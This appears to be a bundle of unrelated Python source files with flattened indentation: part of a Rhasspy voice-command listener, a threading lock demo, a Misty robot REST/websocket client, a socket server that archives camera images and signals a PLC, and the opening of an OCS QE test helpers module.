self.buffer_count: int = 0
self.chunk: bytes = bytes()
self.chunk_size: int = 960
self.handle = True
self.in_phrase: bool = False
self.min_phrase_buffers: int = 0
self.min_sec: float = 2
self.receiver: Optional[RhasspyActor] = None
self.recorder: Optional[RhasspyActor] = None
self.sample_rate: int = 16000
self.seconds_per_buffer: float = 0
self.settings: Dict[str, Any] = {}
self.silence_buffers: int = 0
self.silence_sec: float = 0.5
self.speech_buffers: int = 5
self.speech_buffers_left: int = 0
self.throwaway_buffers: int = 10
self.throwaway_buffers_left: int = 0
self.timeout_sec: float = 30
self.vad_mode: int = 0
self.vad: Optional[webrtcvad.Vad] = None
self.timeout_id: str = ""
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.settings = self.profile.get("command.webrtcvad")
self.sample_rate = self.settings["sample_rate"] # 16Khz
self.chunk_size = self.settings["chunk_size"] # 10,20,30 ms
self.vad_mode = self.settings["vad_mode"] # 0-3 (aggressiveness)
self.min_sec = self.settings["min_sec"] # min seconds that command must last
self.silence_sec = self.settings[
"silence_sec"
] # min seconds of silence after command
self.timeout_sec = self.settings[
"timeout_sec"
] # max seconds that command can last
self.throwaway_buffers = self.settings["throwaway_buffers"]
self.speech_buffers = self.settings["speech_buffers"]
self.seconds_per_buffer = self.chunk_size / self.sample_rate
self.vad = webrtcvad.Vad()
assert self.vad is not None
self.vad.set_mode(self.vad_mode)
self.handle = True
self.transition("loaded")
# -------------------------------------------------------------------------
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForCommand):
if message.timeout is not None:
# Use message timeout
self.timeout_sec = message.timeout
else:
# Use default timeout
self.timeout_sec = self.settings["timeout_sec"]
self._logger.debug("Will timeout in %s second(s)", self.timeout_sec)
self.receiver = message.receiver or sender
self.transition("listening")
self.handle = message.handle
self.send(self.recorder, StartStreaming(self.myAddress))
def to_listening(self, from_state: str) -> None:
"""Transition to listening state."""
self.timeout_id = str(uuid.uuid4())
self.wakeupAfter(timedelta(seconds=self.timeout_sec), payload=self.timeout_id)
# Reset state
self.chunk = bytes()
self.silence_buffers = int(
math.ceil(self.silence_sec / self.seconds_per_buffer)
)
self.min_phrase_buffers = int(math.ceil(self.min_sec / self.seconds_per_buffer))
self.throwaway_buffers_left = self.throwaway_buffers
self.speech_buffers_left = self.speech_buffers
self.in_phrase = False
self.after_phrase = False
self.buffer_count = 0
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, WakeupMessage):
if message.payload == self.timeout_id:
# Timeout
self._logger.warning("Timeout")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver,
VoiceCommand(
self.buffer or bytes(), timeout=True, handle=self.handle
),
)
self.buffer = bytes()
self.transition("loaded")
elif isinstance(message, AudioData):
self.chunk += message.data
if len(self.chunk) >= self.chunk_size:
# Ensure audio data is properly chunked (for webrtcvad)
data = self.chunk[: self.chunk_size]
self.chunk = self.chunk[self.chunk_size :]
# Process chunk
finished = self.process_data(data)
if finished:
# Stop recording
self.send(self.recorder, StopStreaming(self.myAddress))
# Response
self.send(
self.receiver,
VoiceCommand(self.buffer, timeout=False, handle=self.handle),
)
self.buffer = bytes()
self.transition("loaded")
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
# Stop recording
self.send(self.recorder, StopStreaming(self.myAddress))
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> bool:
"""Process a single audio chunk."""
finished = False
self.buffer_count += 1
# Throw away first N buffers (noise)
if self.throwaway_buffers_left > 0:
self.throwaway_buffers_left -= 1
return False
# Detect speech in chunk
assert self.vad is not None
is_speech = self.vad.is_speech(data, self.sample_rate)
if is_speech and self.speech_buffers_left > 0:
self.speech_buffers_left -= 1
elif is_speech and not self.in_phrase:
# Start of phrase
self._logger.debug("Voice command started")
self.in_phrase = True
self.after_phrase = False
self.min_phrase_buffers = int(
math.ceil(self.min_sec / self.seconds_per_buffer)
)
self.buffer = data
elif self.in_phrase and (self.min_phrase_buffers > 0):
# In phrase, before minimum seconds
self.buffer += data
self.min_phrase_buffers -= 1
elif self.in_phrase and is_speech:
# In phrase, after minimum seconds
self.buffer += data
elif not is_speech:
# Outside of speech
if not self.in_phrase:
# Reset
self.speech_buffers_left = self.speech_buffers
elif self.after_phrase and (self.silence_buffers > 0):
# After phrase, before stop
self.silence_buffers -= 1
self.buffer += data
elif self.after_phrase and (self.silence_buffers <= 0):
# Phrase complete
self._logger.debug("Voice command finished")
finished = True
self.buffer += data
elif self.in_phrase and (self.min_phrase_buffers <= 0):
# Transition to after phrase
self.after_phrase = True
self.silence_buffers = int(
math.ceil(self.silence_sec / self.seconds_per_buffer)
)
return finished
# -----------------------------------------------------------------------------
# Command-line Voice Command Listener
# -----------------------------------------------------------------------------
class CommandCommandListener(RhasspyActor):
"""Command-line based voice command listener"""
def __init__(self):
RhasspyActor.__init__(self)
self.receiver: Optional[RhasspyActor] = None
self.command: List[str] = []
self.listen_proc = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
program = os.path.expandvars(self.profile.get("command.command.program"))
arguments = [
os.path.expandvars(str(a))
for a in self.profile.get("command.command.arguments", [])
]
self.command = [program] + arguments
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.receiver = message.receiver or sender
self.listen_proc = subprocess.Popen(self.command, stdout=subprocess.PIPE)
def post_result() -> None:
# STDOUT -> WAV data
try:
wav_data, _ = self.listen_proc.communicate()
except Exception:
wav_data = bytes()
self._logger.exception("post_result")
# Actor will forward
audio_data = convert_wav(wav_data)
self.send(
self.myAddress, VoiceCommand(audio_data, handle=message.handle)
)
self.transition("listening")
# Wait for program in a separate thread
threading.Thread(target=post_result, daemon=True).start()
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, VoiceCommand):
# Pass downstream to receiver
self.send(self.receiver, message)
self.transition("started")
# -----------------------------------------------------------------------------
# One Shot Command Listener
# -----------------------------------------------------------------------------
class OneShotCommandListener(RhasspyActor):
"""Assumes entire voice command comes in first audio data"""
def __init__(self):
RhasspyActor.__init__(self)
self.receiver: Optional[RhasspyActor] = None
self.recorder: Optional[RhasspyActor] = None
self.timeout_sec: float = 30
self.handle: bool = False
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.timeout_sec = self.profile.get("command.oneshot.timeout_sec", 30)
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.receiver = message.receiver or sender
self.handle = message.handle
self.transition("listening")
if message.timeout is not None:
# Use message timeout
timeout_sec = message.timeout
else:
# Use default timeout
timeout_sec = self.timeout_sec
self.send(self.recorder, StartStreaming(self.myAddress))
self.wakeupAfter(timedelta(seconds=timeout_sec))
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
assert self.receiver is not None
self.transition("started")
self.send(self.recorder, StopStreaming(self.myAddress))
self._logger.debug("Received %s byte(s) of audio data", len(message.data))
            self.send(self.receiver, VoiceCommand(message.data, handle=self.handle))
elif isinstance(message, WakeupMessage):
# Timeout
self._logger.warning("Timeout")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver, VoiceCommand(bytes(), timeout=True, handle=self.handle)
)
self.transition("started")
# -----------------------------------------------------------------------------
# MQTT-Based Command Listener (Hermes Protocol)
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesCommandListener(RhasspyActor):
"""Records between startListening/stopListening messages."""
def __init__(self):
RhasspyActor.__init__(self)
self.receiver: Optional[RhasspyActor] = None
self.recorder: Optional[RhasspyActor] = None
self.mqtt: Optional[RhasspyActor] = None
self.handle: bool = False
self.buffer: bytes = bytes()
self.timeout_id: str = ""
self.timeout_sec: float = 30
self.site_ids: List[str] = []
self.start_topic = "hermes/asr/startListening"
self.stop_topic = "hermes/asr/stopListening"
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.mqtt = self.config["mqtt"]
self.timeout_sec = self.profile.get("command.hermes.timeout_sec", 30)
# Subscribe to MQTT topics
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
self.send(self.mqtt, MqttSubscribe(self.start_topic))
self.send(self.mqtt, MqttSubscribe(self.stop_topic))
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.buffer = bytes()
self.receiver = message.receiver or sender
self.handle = message.handle
self.transition("listening")
if message.timeout is not None:
# Use message timeout
timeout_sec = message.timeout
else:
# Use default timeout
timeout_sec = self.timeout_sec
self.send(self.recorder, StartStreaming(self.myAddress))
self.timeout_id = str(uuid.uuid4())
self.wakeupAfter(timedelta(seconds=timeout_sec), payload=self.timeout_id)
elif isinstance(message, MqttMessage):
# startListening
if message.topic == self.start_topic:
payload_json = json.loads(message.payload)
if payload_json.get("siteId", "default") in self.site_ids:
# Wake up Rhasspy
self._logger.debug("Received startListening")
self.send(self._parent, ListenForCommand())
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
self.buffer += message.data
elif isinstance(message, WakeupMessage):
if message.payload == self.timeout_id:
# Timeout
self._logger.warning("Timeout")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver,
VoiceCommand(self.buffer, timeout=True, handle=self.handle),
)
self.transition("started")
elif isinstance(message, MqttMessage):
if message.topic == self.stop_topic:
# stopListening
payload_json = json.loads(message.payload)
if payload_json.get("siteId", "default") in self.site_ids:
self._logger.debug("Received stopListening")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver, VoiceCommand(self.buffer, handle=self.handle)
)
self.transition("started")
|
03.lock_concurrent.py
|
import threading
lock = threading.Lock()
class Account:
def __init__(self, balance):
self.balance = balance
def draw(account, amount):
with lock:
if account.balance >= amount:
            print(threading.current_thread().name,
                  "transaction succeeded")
            account.balance -= amount
            print(threading.current_thread().name,
                  "balance:", account.balance)
        else:
            print(threading.current_thread().name,
                  "transaction failed: insufficient balance")
if __name__ == '__main__':
account = Account(1000)
ta = threading.Thread(name="ta", target=draw, args=(account, 800))
tb = threading.Thread(name="tb", target=draw, args=(account, 800))
ta.start()
tb.start()
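# Without the `with lock:` block both threads can pass the balance check before either one
# subtracts, so two 800 withdrawals could both "succeed" and leave the 1000 balance at -600.
# The lock makes the check-and-withdraw sequence atomic: exactly one of ta/tb succeeds and the
# other reports insufficient balance.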
|
mistyPy.py
|
import requests
import json
import threading
import time
import websocket
try:
import thread
except ImportError:
import _thread as thread
from random import randint
class Robot:
def __init__(self,ip):
self.ip = ip
self.images_saved = []
self.audio_saved = []
self.faces_saved = []
self.backpack_instance = None
self.time_of_flight_instance = [None]*4
self.face_recognition_instance = None
self.available_subscriptions = ["SerialMessage", "TimeOfFlight","FaceRecognition","LocomotionCommand","HaltCommand","SelfState","WorldState"]
self.populateImages()
self.populateAudio()
self.populateLearnedFaces()
def changeLED(self,red,green,blue):
assert red in range(0,256) and blue in range(0,256) and green in range(0,256), " changeLED: The colors need to be in 0-255 range"
requests.post('http://'+self.ip+'/api/led',json={"red": red,"green": green,"blue": blue})
def changeImage(self,image_name,timeout=5):
if image_name in self.images_saved:
            requests.post('http://'+self.ip+'/api/images/display',json={'FileName': image_name ,'TimeOutSeconds': timeout,'Alpha': 1})
else:
print(image_name,"not found on the robot, use <robot_name>.printImageList() to see the list of saved images")
def playAudio(self,file_name):
if file_name in self.audio_saved:
requests.post('http://'+self.ip+'/api/audio/play',json={"AssetId": file_name})
else:
print(file_name,"not found on the robot, use <robot_name>.printAudioList() to see the list of saved audio files")
def battery(self):
resp = requests.get('http://'+self.ip+'/api/battery')
for reply in resp.json():
return (reply)
def moveHead(self,roll,pitch,yaw,velocity=5):
        assert roll in range(-5,6) and pitch in range(-5,6) and yaw in range(-5,6), " moveHead: Roll, Pitch and Yaw need to be in the range -5 to +5"
assert velocity in range(0,11), " moveHead: Velocity needs to be in range 0 to 10"
requests.post('http://'+self.ip+'/api/head',json={"Pitch": pitch, "Roll": roll, "Yaw": yaw, "Velocity": velocity})
def drive(self,linear_velocity, angular_velocity):
assert linear_velocity in range(-100,101) and angular_velocity in range(-100,101), " drive: The velocities needs to be in the range -100 to 100"
requests.post('http://'+self.ip+'/api/drive',json={"LinearVelocity": linear_velocity,"AngularVelocity": angular_velocity})
def driveTime(self,linear_velocity, angular_velocity,time_in_milli_second):
assert linear_velocity in range(-100,101) and angular_velocity in range(-100,101), " driveTime: The velocities needs to be in the range -100 to 100"
assert isinstance(time_in_milli_second, int) or isinstance(time_in_milli_second, float), " driveTime: Time should be an integer or float and the unit is milli seconds"
requests.post('http://'+self.ip+'/api/drive/time',json={"LinearVelocity": linear_velocity,"AngularVelocity": angular_velocity, "TimeMS": time_in_milli_second})
def driveTrack(self,left_track_speed,right_track_speed):
        assert left_track_speed in range(-100,101) and right_track_speed in range(-100,101), " driveTrack: The velocities need to be in the range -100 to 100"
requests.post('http://'+self.ip+'/api/drive/track',json={"LeftTrackSpeed": left_track_speed,"RightTrackSpeed": right_track_speed})
def stop(self):
requests.post('http://'+self.ip+'/api/drive/stop')
def sendBackpack(self,message):
assert isinstance(message, str), " sendBackpack: Message sent to the Backpack should be a string"
requests.post('http://'+self.ip+'/api/serial',json={"Message": message})
def populateImages(self):
self.images_saved = []
resp = requests.get('http://'+self.ip+'/api/images/list')
for reply in resp.json():
# # print(reply)
# for out in reply:
# print("out: " ,out)
self.images_saved.append(reply)
def populateAudio(self):
self.audio_saved = []
resp = requests.get('http://'+self.ip+'/api/audio/list')
for reply in resp.json():
# for out in reply["result"]:
self.audio_saved.append(reply)
def populateLearnedFaces(self):
self.faces_saved = []
resp = requests.get('http://'+self.ip+'/api/faces')
for reply in resp.json():
self.faces_saved = reply
def printImageList(self):
print(self.images_saved)
def getImageList(self):
return self.images_saved
def printAudioList(self):
print(self.audio_saved)
def getAudioList(self):
return self.audio_saved
def printSubscriptionList(self):
print(self.available_subscriptions)
def startFaceRecognition(self):
requests.post('http://'+self.ip+'/api/faces/recognition/start')
def stopFaceRecognition(self):
requests.post('http://'+self.ip+'/api/faces/recognition/stop')
def printLearnedFaces(self):
print(self.faces_saved)
def getLearnedFaces(self):
return self.faces_saved
def clearLearnedFaces(self):
requests.delete('http://'+self.ip+'/api/faces')
self.faces_saved = []
def learnFace(self,name):
assert isinstance(name, str), " trainFace: name must be a string"
requests.post('http://'+self.ip+'/api/faces/training/start',json={"FaceId": name})
print("Please look at Misty's face for 15 seconds..")
for i in range(15):
print(15-i)
time.sleep(1)
print("Face Captured!!")
print("Please allow 15 second processing time !")
for i in range(15):
print(15-i)
time.sleep(1)
print("Face Trained")
self.populateLearnedFaces()
##### WEB SOCKETS #####
def backpack(self):
if self.backpack_instance is not None:
data = self.backpack_instance.data
try:
return json.loads(data)["message"]["message"]
except:
return json.loads(data)
else:
return " Backpack data is not subscribed, use the command robot_name.subscribe(\"SerialMessage\")"
def time_of_flight(self):
if self.time_of_flight_instance[0] is not None or self.time_of_flight_instance[1] is not None or self.time_of_flight_instance[2] is not None or self.time_of_flight_instance[3] is not None:
out = "{"
for i in range(4):
try:
data_out = json.loads(self.time_of_flight_instance[i].data)
#print(data_out)
out+="\""+data_out["message"]["sensorPosition"]+"\""+":"
out+=str(data_out["message"]["distanceInMeters"])+","
except:
return json.loads(self.time_of_flight_instance[i].data)
out = out[:-1]
out+="}"
return json.loads(out)
else:
return " TimeOfFlight not subscribed, use the command robot_name.subscribe(\"TimeOfFlight\")"
def faceRec(self):
data = json.loads(self.face_recognition_instance.data)
try:
out = "{ \"personName\" : \"" + data["message"]["personName"] + "\", \"distance\" : \"" + str(data["message"]["distance"]) + "\", \"elevation\" :\"" + str(data["message"]["elevation"]) + "\"}"
return(json.loads(out))
except:
return json.loads(self.face_recognition_instance.data)
def subscribe(self,Type,value=None,debounce =0):
assert isinstance(Type, str), " subscribe: type name need to be string"
if Type in self.available_subscriptions:
if Type == "SerialMessage":
if self.backpack_instance is None:
self.backpack_instance = Socket(self.ip,Type,_value=value, _debounce = debounce)
time.sleep(1)
elif Type == "TimeOfFlight":
if self.time_of_flight_instance[0] is None:
self.time_of_flight_instance[0] = Socket(self.ip,Type,_value="Left", _debounce = debounce)
time.sleep(0.05)
self.time_of_flight_instance[1] = Socket(self.ip,Type,_value="Center", _debounce = debounce)
time.sleep(0.05)
self.time_of_flight_instance[2] = Socket(self.ip,Type,_value="Right", _debounce = debounce)
time.sleep(0.05)
self.time_of_flight_instance[3] = Socket(self.ip,Type,_value="Back", _debounce = debounce)
time.sleep(1)
elif Type == "FaceRecognition":
if self.face_recognition_instance is None:
self.startFaceRecognition()
print("FaceRecStarted")
self.face_recognition_instance = Socket(self.ip,Type,_value="ComputerVision", _debounce = debounce)
else:
print(" subscribe: Type name - ",Type,"is not recognized by the robot, use <robot_name>.printSubscriptionList() to see the list of possible Type names")
def unsubscribe(self,Type):
assert isinstance(Type, str), " unsubscribe: type name need to be string"
if Type in self.available_subscriptions:
if Type == "SerialMessage":
if self.backpack_instance is not None:
self.backpack_instance.unsubscribe()
self.backpack_instance = None
else:
print("Unsubscribe:",Type, "is not subscribed")
elif Type == "TimeOfFlight":
if self.time_of_flight_instance[0] is not None:
for i in range(4):
self.time_of_flight_instance[i].unsubscribe()
time.sleep(0.05)
self.time_of_flight_instance = [None]*4
else:
print("Unsubscribe:",Type,"is not subscribed")
if Type == "FaceRecognition":
if self.face_recognition_instance is not None:
self.face_recognition_instance.unsubscribe()
self.face_recognition_instance = None
self.stopFaceRecognition()
else:
print("Unsubscribe:",Type, "is not subscribed")
else:
print(" unsubscribe: Type name - ",Type,"is not recognised by the robot, use <robot_name>.printSubscriptionList() to see the list of possible Type names")
# Every web socket is considered an instance
class Socket:
def __init__(self, ip,Type, _value = None, _debounce = 0):
self.ip = ip
self.Type = Type
self.value = _value
self.debounce = _debounce
self.data = "{\"status\":\"Not_Subscribed or just waiting for data\"}"
self.event_name = None
self.ws = None
self.initial_flag = True
dexter = threading.Thread(target=self.initiate)
dexter.start()
def initiate(self):
websocket.enableTrace(True)
self.ws = websocket.WebSocketApp("ws://"+self.ip+"/pubsub",on_message = self.on_message,on_error = self.on_error,on_close = self.on_close)
self.ws.on_open = self.on_open
self.ws.run_forever(ping_timeout=10)
def on_message(self,ws,message):
if self.initial_flag:
self.initial_flag = False
else:
self.data = message
def on_error(self,ws, error):
print(error)
def on_close(self,ws):
ws.send(str(self.get_unsubscribe_message(self.Type)))
self.data = "{\"status\":\"Not_Subscribed or just waiting for data\"}"
print("###",self.Type," socket is closed ###")
def on_open(self,ws):
def run(*args):
self.ws.send(str(self.get_subscribe_message(self.Type)))
thread.start_new_thread(run, ())
def unsubscribe(self):
self.on_close(self.ws)
def get_subscribe_message(self,Type):
self.event_name = str(randint(0,10000000000))
if Type == "SerialMessage":
subscribeMsg = {
"Operation": "subscribe",
"Type": "SerialMessage",
"DebounceMs": self.debounce,
"EventName": self.event_name,
"Message": "",
"ReturnProperty": "SerialMessage"}
elif Type == "TimeOfFlight":
subscribeMsg = {
"$id" : "1",
"Operation": "subscribe",
"Type": "TimeOfFlight",
"DebounceMs": self.debounce,
"EventName": self.event_name,
"Message": "",
"ReturnProperty": "",
"EventConditions":
[{
"Property": "SensorPosition",
"Inequality": "=",
"Value": self.value
}]}
elif Type == "FaceRecognition":
subscribeMsg = {
"Operation": "subscribe",
"Type": self.value,
"DebounceMs": self.debounce,
"EventName": self.event_name,
"Message": "",
"ReturnProperty": ""}
return subscribeMsg
def get_unsubscribe_message(self,Type):
if Type == "SerialMessage":
unsubscribeMsg = {
"Operation": "unsubscribe",
"EventName": self.event_name,
"Message": ""}
elif Type == "TimeOfFlight":
unsubscribeMsg = {
"Operation": "unsubscribe",
"EventName": self.event_name,
"Message": ""}
elif Type == "FaceRecognition":
unsubscribeMsg = {
"Operation": "unsubscribe",
"EventName": self.event_name,
"Message": ""}
return unsubscribeMsg
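# Illustrative usage sketch (the IP address is hypothetical; the methods shown are the ones
# defined on Robot above, and time_of_flight() only returns sensor data once the subscription
# has started delivering messages):
#
#   misty = Robot("192.168.1.100")
#   misty.changeLED(0, 255, 0)
#   misty.subscribe("TimeOfFlight")
#   print(misty.time_of_flight())
#   misty.unsubscribe("TimeOfFlight")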
|
RecvImgandSendSig.py
|
#!/usr/bin/env python3
# *_* coding: UTF-8 *_*
# @File : test.py
# @Author: Frank1126lin
# @Date : 2020/11/1
import os
import time
import shutil
import socket
import threading
def s1():
    ss1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object
    host = socket.gethostbyname(socket.gethostname()) # get the local hostname
    # host = "192.168.2.200"
    port = 2200 # port number
    ss1.bind((host, port)) # bind to the port
    ss1.listen(5)
    print(f"@Listening on@:{host}:{port}")
global src_path
src_path = "Z:\\"
global tar_path
tar_path = os.path.join(os.getcwd(),"china_photo", time.strftime("%Y-%m-%d", time.localtime(time.time())))
if not os.path.exists(tar_path):
os.makedirs(tar_path)
while True:
        conn, addr = ss1.accept() # accept a client connection
        print(f"@{addr[0]}:{addr[1]} connected")
        while True:
            m = conn.recv(1024)
            if not m:
                break
            m = m.decode("utf-8")
            print(f"@{addr[0]} says: {m}")
            photo_name = time.strftime('%Y-%m-%d-%H-%M-%S',time.localtime(time.time())) + ".bmp"
            # print(photo_name)
            if m == "CCD10":
                src_photo = os.path.join(src_path, "CCD10.bmp")
                tar_photo = os.path.join(tar_path, f"flatness-{photo_name}")
                if not os.path.exists(src_photo):
                    print("Flatness image does not exist! Please check and retry!")
                    continue
                shutil.copy(src_photo, tar_photo)
                print("Image saved to", tar_photo)
            if m == "CCD11":
                src_photo = os.path.join(src_path, "CCD11.bmp")
                tar_photo = os.path.join(tar_path, f"top-appearance-{photo_name}")
                if not os.path.exists(src_photo):
                    print("Top appearance image does not exist! Please check and retry!")
                    continue
                shutil.copy(src_photo, tar_photo)
                print("Image saved to", tar_photo)
                event.set()
            if m == "CCD20":
                src_photo = os.path.join(src_path, "CCD20.bmp")
                tar_photo = os.path.join(tar_path, f"bottom-appearance-{photo_name}")
                if not os.path.exists(src_photo):
                    print("Bottom appearance image does not exist! Please check and retry!")
                    continue
                shutil.copy(src_photo, tar_photo)
                print("Image saved to", tar_photo)
def s2():
    ss2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object
    host = socket.gethostbyname(socket.gethostname()) # get the local hostname
    # host = "192.168.2.200"
    port = 2100 # port number
    ss2.bind((host, port)) # bind to the port
    ss2.listen(5)
    print(f"@Listening on@:{host}:{port}")
    conn, addr = ss2.accept() # accept a client connection
    print(f"@{addr[0]}:{addr[1]} connected")
    while True:
        event.clear()
        m = conn.recv(1024)
        if not m:
            return
        print(f"@{addr[0]} says: {m}")
        msg = b"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        event.wait()
        conn.send(msg)
        print(f"@{host} replying: {msg}")
if __name__ == '__main__':
event = threading.Event()
server_th = threading.Thread(target=s1)
plc_th = threading.Thread(target=s2)
server_th.start()
plc_th.start()
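# Illustrative client sketch (assumes the camera PC sends plain-text trigger names such as
# "CCD11" to port 2200 on this machine; the values mirror the ones hard-coded above):
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect((socket.gethostbyname(socket.gethostname()), 2200))
#   c.send(b"CCD11")  # server archives CCD11.bmp and sets the event used by s2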
|
helpers.py
|
"""
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix trimmed due to
kubernetes limitation of 63 characters
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
return name if len(name) < 40 else name[:40]
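# Illustrative example (the uuid suffix is generated at call time): calling
# create_unique_resource_name("mytest", "pvc") returns a name of the form
# "pvc-mytest-<uuid hex>", trimmed to at most 40 characters.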
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get("metadata").get("name")
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create resource {resource_name}"
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None,
pvc_name=None,
do_reload=True,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None,
pod_dict_path=None,
sa_name=None,
dc_deployment=False,
raw_block_pv=False,
raw_block_device=constants.RAW_BLOCK_DEVICE,
replica_count=1,
pod_name=None,
node_selector=None,
command=None,
command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED,
subpath=None,
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
subpath (str): Value of subPath parameter in pod yaml
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if (
interface_type == constants.CEPHBLOCKPOOL
or interface_type == constants.CEPHBLOCKPOOL_THICK
):
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(f"test-{interface}", "pod")
pod_data["metadata"]["name"] = pod_name
pod_data["metadata"]["namespace"] = namespace
if dc_deployment:
pod_data["metadata"]["labels"]["app"] = pod_name
pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
pod_data["spec"]["replicas"] = replica_count
if pvc_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
else:
pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("template")
.get("spec")
.get("volumes")[0]
.get("name"),
}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
]
security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
pod_data["spec"]["template"]["spec"]["containers"][0][
"securityContext"
] = security_context
pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeDevices"
] = temp_dict
elif (
pod_dict_path == constants.NGINX_POD_YAML
or pod_dict == constants.CSI_RBD_POD_YAML
):
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("name"),
}
]
